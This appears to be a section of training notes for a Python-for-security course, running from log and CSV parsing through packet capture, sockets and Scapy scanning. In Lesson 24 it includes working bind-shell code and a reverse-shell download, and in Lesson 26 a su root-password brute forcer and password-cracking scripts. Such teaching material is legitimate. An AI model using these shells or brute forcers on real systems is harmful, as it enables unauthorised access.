  1202. Run "IDLE (Python GUI)"
  1203.  
  1204. File -> New Window
  1205. attack="SQLI"
  1206. if attack=="SQLI":
  1207.     print 'The attacker is using SQLI'
  1208.  
  1209.  
  1210.  
  1211. Run -> Run Module   or  Press "F5"
  1212.  
  1213. File >> New Window
  1214. attack="XSS"
  1215. if attack=="SQLI":
  1216.     print 'The attacker is using SQLI'
  1217.  
  1218.  
  1219. Run -> Run Module   or  Press "F5"
  1220.  
  1221.  
  1222.  
  1223. #############################
  1224. # Reference Videos To Watch #
  1225. #############################
  1226. Here is your first set of youtube videos that I'd like for you to watch:
  1227. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
  1228.  
  1229.  
  1230.  
  1231.  
  1232.  
  1233. ####################################
  1234. # Lesson 11: Intro to Log Analysis #
  1235. ####################################
  1236.  
  1237. Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:
  1238.  
  1239. https://s3-us-west-2.amazonaws.com/infosecaddicts/InfoSecAddictsVM.zip
  1240. user:      infosecaddicts
  1241. pass:      infosecaddicts
  1242.  
  1243. Then execute the following commands:
  1244. ---------------------------------------------------------------------------------------------------------
  1245.  
  1246. NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt.
  1247.  
  1248. wget https://s3.amazonaws.com/SecureNinja/Python/access_log
  1249.  
  1250.  
  1251. cat access_log | grep 141.101.80.188
  1252.  
  1253. cat access_log | grep 141.101.80.187
  1254.  
  1255. cat access_log | grep 108.162.216.204
  1256.  
  1257. cat access_log | grep 173.245.53.160
  1258.  
  1259. ---------------------------------------------------------
  1260.  
  1261. Google the following terms:
  1262.     - Python read file
  1263.     - Python read line
  1264.     - Python read from file
  1265.  
  1266.  
  1267.  
  1268.  
  1269. ########################################################
  1270. # Lesson 12: Use Python to read in a file line by line #
  1271. ########################################################
  1272.  
  1273.  
  1274. Reference:
  1275. http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
  1276.  
  1277.  
  1278.  
  1279. ---------------------------------------------------------
  1280. vi logread1.py
  1281.  
  1282.  
  1283. ## Open the file with read only permit
  1284. f = open('access_log', "r")
  1285.  
  1286. ## use readlines to read all lines in the file
  1287. ## The variable "lines" is a list containing all lines
  1288. lines = f.readlines()
  1289.  
  1290. print lines
  1291.  
  1292.  
  1293. ## close the file after reading the lines.
  1294. f.close()
  1295.  
  1296. ---------------------------------------------------------
  1297.  
  1298.  
  1299. Google the following:
  1300.     - python difference between readlines and readline
  1301.     - python readlines and readline
  1302.  
  1303.  
  1304.  
  1305.  
  1306.  
  1307. ################################
  1308. # Lesson 13: A quick challenge #
  1309. ################################
  1310.  
  1311. Can you write an if/then statement that looks for this IP and print "Found it"?
  1312.  
  1313.  
  1314. 141.101.81.187
  1315.  
  1316.  
  1317.  
  1318.  
  1319.  
  1320.  
  1321. ---------------------------------------------------------
  1322. Hint 1: Use Python to look for a value in a list
  1323.  
  1324. Reference:
  1325. http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
  1326.  
  1327.  
  1328.  
  1329.  
  1330. ---------------------------------------------------------
  1331. Hint 2: Use Python to prompt for user input
  1332.  
  1333. Reference:
  1334. http://www.cyberciti.biz/faq/python-raw_input-examples/
  1335.  
  1336.  
  1337.  
  1338.  
  1339. ---------------------------------------------------------
  1340. Hint 3: Use Python to search for a string in a list
  1341.  
  1342. Reference:
  1343. http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
  1344.  
  1345.  
  1346.  
  1347.  
  1348.  
  1349. Here is my solution:
  1350. -------------------
  1351. $ python
  1352. >>> f = open('access_log', "r")
  1353. >>> lines = f.readlines()
  1354. >>> ip = '141.101.81.187'
  1355. >>> for string in lines:
  1356. ... if ip in string:
  1357. ...         print(string)
  1358.  
  1359.  
  1360.  
  1361.  
  1362. Here is one student's solution - can you please explain each line of this code to me?
  1363. -------------------------------------------------------------------------------------
  1364. #!/usr/bin/python
  1365.  
  1366. f = open('access_log')
  1367.  
  1368. strUsrinput = raw_input("Enter IP Address: ")
  1369.  
  1370. for line in iter(f):
  1371.     ip = line.split(" - ")[0]
  1372.     if ip == strUsrinput:
  1373.         print line
  1374.  
  1375. f.close()
  1376.  
  1377.  
  1378.  
  1379.  
  1380. -------------------------------
  1381.  
  1382. Working with another student after class we came up with another solution:
  1383.  
  1384. #!/usr/bin/env python
  1385.  
  1386.  
  1387. # This line opens the log file
  1388. f=open('access_log',"r")
  1389.  
  1390. # This line takes each line in the log file and stores it as an element in the list
  1391. lines = f.readlines()
  1392.  
  1393.  
  1394. # This lines stores the IP that the user types as a var called userinput
  1395. userinput = raw_input("Enter the IP you want to search for: ")
  1396.  
  1397.  
  1398.  
  1399. # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
  1400. for ip in lines:
  1401.     if ip.find(userinput) != -1:
  1402.         print ip
  1403.  
  1404.  
  1405.  
  1406. ##################################################
  1407. # Lession 14: Look for web attacks in a log file #
  1408. ##################################################
  1409.  
  1410. In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.
  1411. Supported attacks:
  1412. 1.      SQL Injection
  1413. 2.      Local File Inclusion
  1414. 3.      Remote File Inclusion
  1415. 4.      Cross-Site Scripting
  1416.  
  1417.  
  1418.  
  1419. wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py
  1420.  
  1421. The usage for scan_log.py is simple.  You feed it an apache log file.
  1422.  
  1423. cat scan_log.py | less          (use your up/down arrow keys to look through the file)
  1424.  
  1425. Explain to me how this script works.
  1426.  
  1427.  
  1428.  
  1429. ################################
  1430. # Lesson 15: Parsing CSV Files #
  1431. ################################
  1432.  
  1433. Dealing with csv files
  1434.  
  1435. Reference:
  1436. http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/
  1437.  
  1438. Type the following commands:
  1439. ---------------------------------------------------------------------------------------------------------
  1440.  
  1441. wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv
  1442.  
  1443.  
  1444. Example 1 - Reading CSV files
  1445. -----------------------------
  1446. #To be able to read csv formated files, we will first have to import the
  1447. #csv module.
  1448.  
  1449.  
  1450. import csv
  1451. with open('class_nessus.csv', 'rb') as f:
  1452.     reader = csv.reader(f)
  1453.     for row in reader:
  1454.         print row
  1455.  
  1456.  
  1457.  
  1458.  
  1459.  
  1460.  
  1461. Example 2 - Reading CSV files
  1462. -----------------------------
  1463. vi readcsv.py
  1464.  
  1465.  
  1466. #!/usr/bin/python
  1467. import csv                  # imports the csv module
  1468. import sys                  # imports the sys module
  1469.  
  1470. f = open(sys.argv[1], 'rb')         # opens the csv file
  1471. try:
  1472.     reader = csv.reader(f)          # creates the reader object
  1473.     for row in reader:          # iterates the rows of the file in orders
  1474.         print row               # prints each row
  1475. finally:
  1476.     f.close()               # closing
  1477.  
  1478.  
  1479.  
  1480.  
  1481.  
  1482.  
  1483. Example 3 - - Reading CSV files
  1484. -------------------------------
  1485. vi readcsv2.py
  1486.  
  1487.  
  1488. #!/usr/bin/python
  1489. # This program will then read it and displays its contents.
  1490.  
  1491.  
  1492. import csv
  1493.  
  1494. ifile  = open('class_nessus.csv', "rb")
  1495. reader = csv.reader(ifile)
  1496.  
  1497. rownum = 0
  1498. for row in reader:
  1499.     # Save header row.
  1500.     if rownum == 0:
  1501.         header = row
  1502.     else:
  1503.         colnum = 0
  1504.         for col in row:
  1505.             print '%-8s: %s' % (header[colnum], col)
  1506.             colnum += 1
  1507.            
  1508.     rownum += 1
  1509.  
  1510. ifile.close()
  1511.  
  1512.  
  1513.  
  1514.  
  1515.  
  1516.  
  1517.  
  1518.  
  1519. python readcsv2.py | less
  1520.  
  1521.  
  1522.  
  1523.  
  1524.  
  1525.  
  1526.  
  1527.  
  1528. /---------------------------------------------------/    
  1529. --------------------PARSING CSV FILES----------------
  1530. /---------------------------------------------------/
  1531.  
  1532. -------------TASK 1------------
  1533. vi readcsv3.py
  1534.  
  1535. #!/usr/bin/python
  1536. import csv
  1537. f = open('class_nessus.csv', 'rb')
  1538. try:
  1539.     rownum = 0
  1540.     reader = csv.reader(f)
  1541.     for row in reader:
  1542.          #Save header row.
  1543.         if rownum == 0:
  1544.             header = row
  1545.         else:
  1546.             colnum = 0
  1547.             if row[3].lower() == 'high':
  1548.                 print '%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
  1549.         rownum += 1
  1550. finally:
  1551.     f.close()
  1552.  
  1553.  
  1554.  
  1555.  
  1556.  
  1557. python readcsv3.py | less
  1558.    
  1559. -------------TASK 2------------
  1560. vi readcsv4.py
  1561.  
  1562. #!/usr/bin/python
  1563. import csv
  1564. f = open('class_nessus.csv', 'rb')
  1565. try:
  1566.     print '/---------------------------------------------------/'
  1567.     rownum = 0
  1568.     hosts = {}
  1569.     reader = csv.reader(f)
  1570.     for row in reader:
  1571.         # Save header row.
  1572.         if rownum == 0:
  1573.             header = row
  1574.         else:
  1575.             colnum = 0
  1576.             if row[3].lower() == 'high' and row[4] not in hosts:
  1577.                 hosts[row[4]] = row[4]
  1578.                 print '%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
  1579.         rownum += 1
  1580. finally:
  1581.     f.close()
  1582.  
  1583.  
  1584. python readcsv4.py | less
  1585.  
  1586.  
  1587.  
  1588.  
  1589.  
  1590.  
  1591.  
  1592.  
  1593.  
  1594.  
  1595.  
  1596.  
  1597.  
  1598.  
  1599. #################################################
  1600. # Lesson 16: Parsing Packets with Python's DPKT #
  1601. #################################################
  1602. The first thing that you will need to do is install dpkt.
  1603.  
  1604. sudo apt-get install -y python-dpkt
  1605.  
  1606.  
  1607.  
  1608.  
  1609. Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'.
  1610. Run tcpdump to capture a .pcap file that we will use for the next exercise
  1611.  
  1612.  
  1613. sudo tcpdump -ni eth0 -s0 -w quick.pcap
  1614.  
  1615.  
  1616. --open another command prompt--
  1617. wget http://packetlife.net/media/library/12/tcpdump.pdf
  1618.  
  1619.  
  1620. Let's do something simple:
  1621.  
  1622.  
  1623. vi quickpcap.py
  1624. --------------------------------------------------------
  1625.  
  1626. #!/usr/bin/python
  1627. import dpkt;
  1628.  
  1629. # Simple script to read the timestamps in a pcap file
  1630. # Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html
  1631.  
  1632. f = open("quick.pcap","rb")
  1633. pcap = dpkt.pcap.Reader(f)
  1634.  
  1635. for ts, buf in pcap:
  1636.     print ts;
  1637.  
  1638. f.close();
  1639.  
  1640.  
  1641. --------------------------------------------------------
  1642.  
  1643. Now let's run the script we just wrote
  1644.  
  1645.  
  1646. python quickpcap.py
  1647.  
  1648.  
  1649.  
  1650.  
  1651. How dpkt breaks down a packet:
  1652.  
  1653. Reference:
  1654. http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html
  1655.  
  1656.     src: the MAC address of SOURCE.
  1657.     dst: The MAC address of DESTINATION
  1658.     type: The protocol type of contained ethernet payload.
  1659.  
  1660. The allowed values are listed in the file "ethernet.py",
  1661. such as:
  1662. a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
  1663. b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.
  1664.  
  1665.  
  1666. References:
  1667. http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python
  1668.  
  1669.  
  1670.  
  1671.  
  1672.  
  1673.  
  1674. Ok - now let's have a look at pcapparsing.py
  1675.  
  1676. sudo tcpdump -ni eth0 -s0 -w capture-100.pcap
  1677.  
  1678.  
  1679. --open another command prompt--
  1680. wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
  1681.  
  1682.  
  1683.  
  1684. Ok - now let's have a look at pcapparsing.py
  1685. --------------------------------------------------------
  1686.  
  1687. import socket
  1688. import dpkt
  1689. import sys
  1690. f = open('capture-100.pcap','r')
  1691. pcapReader = dpkt.pcap.Reader(f)
  1692.  
  1693. for ts,data in pcapReader:
  1694.     ether = dpkt.ethernet.Ethernet(data)
  1695.     if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
  1696.     ip = ether.data
  1697.     tcp = ip.data
  1698.     src = socket.inet_ntoa(ip.src)
  1699.     srcport = tcp.sport
  1700.     dst = socket.inet_ntoa(ip.dst)
  1701.     dstport = tcp.dport
  1702.     print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)
  1703.  
  1704. f.close()
  1705.  
  1706. --------------------------------------------------------
  1707.  
  1708.  
  1709.  
  1710. OK - let's run it:
  1711. python pcapparsing.py
  1712.  
  1713.  
  1714.  
  1715. running this script might throw an error like this:
  1716.  
  1717. Traceback (most recent call last):
  1718.   File "pcapparsing.py", line 9, in <module>
  1719.     if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
  1720.  
  1721.  
  1722. If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
  1723.  
  1724.  
  1725.  
  1726.  
  1727. Your homework for today...
  1728.  
  1729.  
  1730. Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
  1731.  
  1732.  
  1733.  
  1734.  
  1735.  
  1736.  
  1737. Your challenge is to fix the Traceback error
  1738.  
  1739.  
  1740.  
  1741.  
  1742. #!/usr/bin/python
  1743.  
  1744. import pcapy
  1745. import dpkt
  1746. import sys
  1747. import socket
  1748. import struct
  1749.  
  1750. SINGLE_SHOT = False
  1751.  
  1752. # list all the network devices
  1753. pcapy.findalldevs()
  1754.  
  1755. iface = "eth0"
  1756. filter = "arp"
  1757. max_bytes = 1024
  1758. promiscuous = False
  1759. read_timeout = 100 # in milliseconds
  1760.  
  1761. pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
  1762. pc.setfilter( filter )
  1763.  
  1764. # callback for received packets
  1765. def recv_pkts( hdr, data ):
  1766.     packet = dpkt.ethernet.Ethernet( data )
  1767.  
  1768.     print type( packet.data )
  1769.     print "ipsrc: %s, ipdst: %s" %( \
  1770.                  socket.inet_ntoa( packet.data.spa ), \
  1771.                  socket.inet_ntoa( packet.data.tpa ) )
  1772.  
  1773.     print "macsrc: %s, macdst: %s " % (
  1774.                 "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
  1775.                 "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) )
  1776.  
  1777. if SINGLE_SHOT:
  1778.     header, data = pc.next()
  1779.     sys.exit(0)
  1780. else:
  1781.     packet_limit = -1 # infinite
  1782.     pc.loop( packet_limit, recv_pkts ) # capture packets
  1783.  
  1784.  
  1785.  
  1786.  
  1787.  
  1788.  
  1789.  
  1790.  
  1791. #############################
  1792. # Reference Videos To Watch #
  1793. #############################
  1794. Here is your second set of youtube videos that I'd like for you to watch:
  1795. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20)
  1796.  
  1797.  
  1798.  
  1799.  
  1800. #############################################
  1801. # Lesson 17: Python Sockets & Port Scanning #
  1802. #############################################
  1803.  
  1804.  
  1805. $ ncat -l -v -p 1234
  1806.  
  1807.  
  1808.  
  1809.  
  1810. --open another terminal--
  1811. python
  1812.  
  1813. >>> import socket
  1814. >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1815. >>> s.connect(('localhost', 1234))
  1816. >>> s.send('Hello, world')
  1817. >>> data = s.recv(1024)
  1818. >>> s.close()
  1819.  
  1820. >>> print 'Received', data
  1821.  
  1822.  
  1823.  
  1824.  
  1825.  
  1826.  
  1827. ########################################
  1828. # Lesson 18: TCP Client and TCP Server #
  1829. ########################################
  1830.  
  1831. vi tcpclient.py
  1832.  
  1833.  
  1834.  
  1835. #!/usr/bin/python
  1836. # tcpclient.py
  1837.  
  1838. import socket
  1839.  
  1840. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1841. hostport = ("127.0.0.1", 1337)
  1842. s.connect(hostport)
  1843. s.send("Hello\n")
  1844. buf = s.recv(1024)
  1845. print "Received", buf
  1846.  
  1847.  
  1848.  
  1849.  
  1850.  
  1851.  
  1852.  
  1853.  
  1854.  
  1855. vi tcpserver.py
  1856.  
  1857.  
  1858.  
  1859.  
  1860.  
  1861. #!/usr/bin/python
  1862. # tcpserver.py
  1863.  
  1864. import socket
  1865.  
  1866. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1867. hostport = ("", 1337)
  1868. s.bind(hostport)
  1869. s.listen(10)
  1870. while 1:
  1871.     cli,addr = s.accept()
  1872.     print "Connection from", addr
  1873.     buf = cli.recv(1024)
  1874.     print "Received", buf
  1875.     if buf == "Hello\n":
  1876.         cli.send("Server ID 1\n")
  1877.     cli.close()
  1878.  
  1879.  
  1880.  
  1881.  
  1882.  
  1883.  
  1884.  
  1885.  
  1886. python tcpserver.py
  1887.  
  1888.  
  1889. --open another terminal--
  1890. python tcpclient.py
  1891.  
  1892.  
  1893. ########################################
  1894. # Lesson 19: UDP Client and UDP Server #
  1895. ########################################
  1896.  
  1897. vi udpclient.py
  1898.  
  1899.  
  1900.  
  1901.  
  1902.  
  1903.  
  1904. #!/usr/bin/python
  1905. # udpclient.py
  1906.  
  1907. import socket
  1908.  
  1909. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1910. hostport = ("127.0.0.1", 1337)
  1911. s.sendto("Hello\n", hostport)
  1912. buf = s.recv(1024)
  1913. print buf
  1914.  
  1915.  
  1916.  
  1917.  
  1918.  
  1919.  
  1920.  
  1921.  
  1922.  
  1923. vi udpserver.py
  1924.  
  1925.  
  1926.  
  1927.  
  1928.  
  1929.  
  1930. #!/usr/bin/python
  1931. # udpserver.py
  1932.  
  1933. import socket
  1934.  
  1935. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1936. hostport = ("127.0.0.1", 1337)
  1937. s.bind(hostport)
  1938. while 1:
  1939.     buf, address = s.recvfrom(1024)
  1940.     print buf
  1941.     if buf == "Hello\n":
  1942.         s.sendto("Server ID 1\n", address)
  1943.  
  1944.  
  1945.  
  1946.  
  1947.  
  1948.  
  1949. python udpserver.py
  1950.  
  1951.  
  1952. --open another terminal--
  1953. python udpclient.py
  1954.  
  1955.  
  1956.  
  1957.  
  1958.  
  1959.  
  1960. ###############################
  1961. # Lesson 20: Installing Scapy #
  1962. ###############################
  1963.  
  1964. sudo apt-get update
  1965. sudo apt-get install python-scapy python-pyx python-gnuplot
  1966.  
  1967.  
  1968. Reference Page For All Of The Commands We Will Be Running:
  1969. http://samsclass.info/124/proj11/proj17-scapy.html
  1970.  
  1971. Great slides for Scapy:
  1972. http://www.secdev.org/conf/scapy_csw05.pdf
  1973.  
  1974.  
  1975.  
  1976.  
  1977. To run Scapy interactively
  1978.  
  1979.     sudo scapy
  1980.  
  1981.  
  1982.  
  1983. ################################################
  1984. # Lesson 21: Sending ICMPv4 Packets with scapy #
  1985. ################################################
  1986.  
  1987. In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
  1988.  
  1989.     i = IP()
  1990.  
  1991.  
  1992.  
  1993.  
  1994. This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
  1995.  
  1996.     i.display()
  1997.  
  1998.  
  1999.  
  2000.  
  2001. Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
  2002.  
  2003.     i.dst="10.65.75.49"
  2004.  
  2005.     i.display()
  2006.  
  2007.  
  2008.  
  2009.  
  2010. Notice that scapy automatically fills in your machine's source IP address.
  2011.  
  2012. Use these commands to create an object named ic of type ICMP and display its properties:
  2013.  
  2014.  
  2015.     ic = ICMP()
  2016.  
  2017.     ic.display()
  2018.  
  2019.  
  2020.  
  2021.  
  2022.  
  2023. Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
  2024.  
  2025.     sr1(i/ic)
  2026.  
  2027.  
  2028.  
  2029.  
  2030.  
  2031. This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply.
  2032.  
  2033. The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
  2034.  
  2035. Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
  2036.  
  2037.  
  2038.     sr1(i/ic/"YOUR NAME")
  2039.  
  2040.  
  2041. You should see a reply with a Raw section containing your name.
  2042.  
  2043.  
  2044.  
  2045. ##############################################
  2046. # Lesson 22: Sending a UDP Packet with Scapy #
  2047. ##############################################
  2048.  
  2049.  
  2050. Preparing the Target
  2051. $ ncat -ulvp 4444
  2052.  
  2053.  
  2054.  
  2055.  
  2056. --open another terminal--
  2057. In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
  2058.  
  2059.     u = UDP()
  2060.  
  2061.     u.display()
  2062.  
  2063.  
  2064.  
  2065. This creates an object named u of type UDP, and displays its properties.
  2066.  
  2067. Execute these commands to change the destination port to 4444 and display the properties again:
  2068.  
  2069.     i.dst="10.10.2.97"              <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
  2070.  
  2071.     u.dport = 4444
  2072.  
  2073.     u.display()
  2074.  
  2075.  
  2076.  
  2077. Execute this command to send the packet to the Windows machine:
  2078.  
  2079.     send(i/u/"YOUR NAME SENT VIA UDP\n")
  2080.  
  2081.  
  2082.  
  2083. On the Windows target, you should see the message appear
  2084.  
  2085.  
  2086.  
  2087.  
  2088. #######################################
  2089. # Lesson 23: Ping Sweeping with Scapy #
  2090. #######################################
  2091.  
  2092.  
  2093.  
  2094. #!/usr/bin/python
  2095. from scapy.all import *
  2096.  
  2097. TIMEOUT = 2
  2098. conf.verb = 0
  2099. for ip in range(0, 256):
  2100.     packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
  2101.     # You will need to change 10.10.30 above this line to the subnet for your network
  2102.     reply = sr1(packet, timeout=TIMEOUT)
  2103.     if not (reply is None):
  2104.          print reply.dst, "is online"
  2105.     else:
  2106.          print "Timeout waiting for %s" % packet[IP].dst
  2107.  
  2108.  
  2109.  
  2110. ###############################################
  2111. # Checking out some scapy based port scanners #
  2112. ###############################################
  2113.  
  2114. wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py
  2115.  
  2116. cat rdp_scan.py
  2117.  
  2118. sudo python rdp_scan.py
  2119.  
  2120.  
  2121. ######################################
  2122. # Dealing with conf.verb=0 NameError #
  2123. ######################################
  2124.  
  2125. conf.verb = 0
  2126. NameError: name 'conf' is not defined
  2127.  
  2128. Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:
  2129.  
  2130. from scapy import *
  2131.     to
  2132. from scapy.all import *
  2133.  
  2134.  
  2135.  
  2136. Reference:
  2137. http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html
  2138.  
  2139.  
  2140. conf.verb=0 is a verbosity setting (configuration/verbosity = conv
  2141.  
  2142.  
  2143.  
  2144. Here are some good Scapy references:
  2145. http://www.secdev.org/projects/scapy/doc/index.html
  2146. http://resources.infosecinstitute.com/port-scanning-using-scapy/
  2147. http://www.hackerzvoice.net/ouah/blackmagic.txt
  2148. http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html
  2149.  
  2150.  
  2151. ######################################
  2152. # Lesson 24: Bind and Reverse Shells #
  2153. ######################################
  2154. vi simplebindshell.py
  2155.  
  2156.  
  2157. #!/bin/python
  2158. import os,sys,socket
  2159.  
  2160. ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
  2161. print '-Creating socket..'
  2162. port = 31337
  2163. try:
  2164.     ls.bind(('', port))
  2165.     print '-Binding the port on '
  2166.     ls.listen(1)
  2167.     print '-Listening, '
  2168.     (conn, addr) = ls.accept()
  2169.     print '-Waiting for connection...'
  2170.     cli= conn.fileno()
  2171.     print '-Redirecting shell...'
  2172.     os.dup2(cli, 0)
  2173.     print 'In, '
  2174.     os.dup2(cli, 1)
  2175.     print 'Out, '
  2176.     os.dup2(cli, 2)
  2177.     print 'Err'
  2178.     print 'Done!'
  2179.     arg0='/bin/sh'
  2180.     arg1='-a'
  2181.     args=[arg0]+[arg1]
  2182.     os.execv(arg0, args)
  2183. except(socket.error):
  2184.     print 'fail\n'
  2185.     conn.close()
  2186.     sys.exit(1)
  2187.  
  2188.  
  2189.  
  2190.  
  2191.  
  2192.  
  2193.  
  2194. nc TARGETIP 31337
  2195.  
  2196.  
  2197.  
  2198. ---------------------
  2199. Preparing the target for a reverse shell
  2200. $ ncat -lvp 4444
  2201.  
  2202.  
  2203.  
  2204. --open another terminal--
  2205. wget https://www.trustedsec.com/files/simple_py_shell.py
  2206.  
  2207. vi simple_py_shell.py
  2208.  
  2209.  
  2210.  
  2211.  
  2212.  
  2213.  
  2214. -------------------------------
  2215. Tricky shells
  2216.  
  2217. Reference:
  2218. http://securityweekly.com/2011/10/python-one-line-shell-code.html
  2219. http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
  2220.  
  2221.  
  2222.  
  2223.  
  2224.  
  2225.  
  2226. #############################
  2227. # Reference Videos To Watch #
  2228. #############################
  2229. Here is your third set of youtube videos that I'd like for you to watch:
  2230. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30)
  2231.  
  2232.  
  2233.  
  2234.  
  2235. #################################################
  2236. # Lesson 25: Python Functions & String Handling #
  2237. #################################################
  2238.  
  2239. Python can make use of functions:
  2240. http://www.tutorialspoint.com/python/python_functions.htm
  2241.  
  2242.  
  2243.  
  2244. Python can interact with the 'crypt' function used to create Unix passwords:
  2245. http://docs.python.org/2/library/crypt.html
  2246.  
  2247.  
  2248.  
  2249. Tonight we will see a lot of the split() method so be sure to keep the following references close by:
  2250. http://www.tutorialspoint.com/python/string_split.htm
  2251.  
  2252.  
  2253. Tonight we will see a lot of slicing so be sure to keep the following references close by:
  2254. http://techearth.net/python/index.php5?title=Python:Basics:Slices
  2255.  
  2256.  
  2257.  
  2258.  
  2259.  
  2260. ################################
  2261. # Lesson 26: Password Cracking #
  2262. ################################
  2263.  
  2264. wget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py
  2265.  
  2266. vi htcrack.py
  2267.  
  2268. vi list.txt
  2269.  
  2270. hello
  2271. goodbye
  2272. red
  2273. blue
  2274. yourname
  2275. tim
  2276. bob
  2277.  
  2278.  
  2279. htpasswd -nd yourname
  2280.     - enter yourname as the password
  2281.  
  2282.  
  2283.  
  2284. python htcrack.py joe:7XsJIbCFzqg/o list.txt
  2285.  
  2286.  
  2287.  
  2288.  
  2289. sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc
  2290.  
  2291. rm -rf mechanize-0.2.5.tar.gz
  2292.  
  2293. sudo /bin/bash
  2294.  
  2295. passwd
  2296.     ***set root password***
  2297.  
  2298.  
  2299.  
  2300.  
  2301. vi rootbrute.py
  2302.  
  2303.  
  2304. #!/usr/bin/env python
  2305.  
  2306. import sys
  2307. try:
  2308.         import pexpect
  2309. except(ImportError):
  2310.         print "\nYou need the pexpect module."
  2311.         print "http://www.noah.org/wiki/Pexpect\n"
  2312.         sys.exit(1)
  2313.  
  2314. #Change this if needed.
  2315. # LOGIN_ERROR = 'su: incorrect password'
  2316. LOGIN_ERROR = "su: Authentication failure"
  2317.  
  2318. def brute(word):
  2319.         print "Trying:",word
  2320.         child = pexpect.spawn('/bin/su')
  2321.         child.expect('Password: ')
  2322.         child.sendline(word)
  2323.         i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
  2324.         if i == 1:
  2325.                 print "Incorrect Password"
  2326.  
  2327.         if i == 2:
  2328.                 print "\n\t[!] Root Password:" ,word
  2329.                 child.sendline ('id')
  2330.                 print child.before
  2331.                 child.interact()
  2332.  
  2333. if len(sys.argv) != 2:
  2334.         print "\nUsage : ./rootbrute.py <wordlist>"
  2335.         print "Eg: ./rootbrute.py words.txt\n"
  2336.         sys.exit(1)
  2337.  
  2338. try:
  2339.         words = open(sys.argv[1], "r").readlines()
  2340. except(IOError):
  2341.         print "\nError: Check your wordlist path\n"
  2342.         sys.exit(1)
  2343.  
  2344. print "\n[+] Loaded:",len(words),"words"
  2345. print "[+] BruteForcing...\n"
  2346. for word in words:
  2347.         brute(word.replace("\n",""))
  2348.  
  2349.  
  2350.  
  2351.  
  2352. References you might find helpful:
  2353. http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python
  2354.  
  2355.  
  2356.  
  2357.  
  2358.  
  2359.  
  2360.  
  2361.  
  2362.  
  2363. wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py
  2364.  
  2365. vi md5crack.py
  2366.  
  2367.  
  2368.  
  2369.  
  2370.  
  2371.  
  2372. Why use hexdigest
  2373. http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string
  2374.  
  2375.  
  2376.  
  2377.  
  2378. http://md5online.net/
  2379.  
  2380.  
  2381.  
  2382.  
  2383.  
  2384.  
  2385.  
  2386. wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py
  2387.  
  2388.  
  2389.  
  2390.  
  2391. #############################
  2392. # Reference Videos To Watch #
  2393. #############################
  2394. Here is your forth set of youtube videos that I'd like for you to watch:
  2395. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40)
  2396.  
  2397.  
  2398.  
  2399.  
  2400.  
  2401.  
  2402.  
  2403.  
